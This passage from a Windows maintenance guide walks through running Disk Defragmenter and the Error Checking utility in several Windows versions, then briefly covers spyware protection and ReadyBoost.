    2.    In the Disk Defragmenter dialog box, click the drives that you want to defragment, and then click the Analyze button. After the disk is analyzed, a dialog box appears, letting you know whether you should defragment the analyzed drives.
    Tip: You should analyze a volume before defragmenting it to get an estimate of how long the defragmentation process will take.
    3.    To defragment the selected drive or drives, click the Defragment disk button. In the Current status area, under the Progress column, you can monitor the process as it happens. After the defragmentation is complete, Disk Defragmenter displays the results.
    4.    To display detailed information about the defragmented disk or partition, click View Report.
    5.    To close the View Report dialog box, click Close.
    6.    You can also schedule the Disk Defragmenter to run automatically, and your computer might be set up this way by default. Under Schedule, it reads Scheduled defragmentation is turned on, then displays the time of day and frequency of defragmentation. If you want to turn off automatic defragmentation or change the time or frequency, click the Configure schedule (or Turn on Schedule, if it is not currently configured to run automatically). Then change the settings, then click OK.
    7.    To close the Disk Defragmenter utility, click the Close button on the title bar of the window.
    To use Disk Defragmenter:
    1.    Click Start, point to All Programs, point to Accessories, point to System Tools, and then click Disk Defragmenter.
     
    Click Analyze disk to start the Disk Defragmenter.
    2.    In the Disk Defragmenter dialog box, click the drives that you want to defragment, and then click the Analyze button. After the disk is analyzed, a dialog box appears, letting you know whether you should defragment the analyzed drives.
    Tip: You should analyze a volume before defragmenting it to get an estimate of how long the defragmentation process will take.
    3.    To defragment the selected drive or drives, click the Defragment button. Note: In Windows Vista, there is no graphical user interface to demonstrate the progress—but your hard drive is still being defragmented.
    After the defragmentation is complete, Disk Defragmenter displays the results.
    4.    To display detailed information about the defragmented disk or partition, click View Report.
    5.    To close the View Report dialog box, click Close.
    6.    To close the Disk Defragmenter utility, click the Close button on the title bar of the window.
    3. Detect and repair disk errors
    In addition to running Disk Cleanup and Disk Defragmenter to optimize the performance of your computer, you can check the integrity of the files stored on your hard disk by running the Error Checking utility.
    As you use your hard drive, it can develop bad sectors. Bad sectors slow down hard disk performance and sometimes make data writing (such as file saving) difficult, or even impossible. The Error Checking utility scans the hard drive for bad sectors, and scans for file system errors to see whether certain files or folders are misplaced.
    If you use your computer daily, you should run this utility once a week to help prevent data loss.

    Run the Error Checking utility:

    1.    Close all open files.
    2.    Click Start, and then click My Computer.
    3.    In the My Computer window, right-click the hard disk you want to search for bad sectors, and then click Properties.
    4.    In the Properties dialog box, click the Tools tab.
    5.    Click the Check Now button.
    6.    In the Check Disk dialog box (called Error-checking in Windows 7), select the Scan for and attempt recovery of bad sectors check box, and then click Start.
     
    Example of Check Disk Local Disk dialog box
    7.    If bad sectors are found, choose to fix them.
    Tip: Only select the "Automatically fix file system errors" check box if you think that your disk contains bad sectors.

    4. Protect your computer against spyware
    Spyware collects personal information without letting you know and without asking for permission. From the websites you visit to usernames and passwords, spyware can put you and your confidential information at risk. In addition to privacy concerns, spyware can hamper your computer's performance. To combat spyware, you might want to consider using the PC safety scan from Windows Live OneCare. This scan is a free service and will help check for and remove viruses.

    5. Learn all about ReadyBoost
    If you're using Windows 7 or Windows Vista, you can use ReadyBoost to speed up your system. A new concept in adding memory to a system, it allows you to use non-volatile flash memory—like a USB flash drive or a memory card—to improve performance without having to add additional memory.

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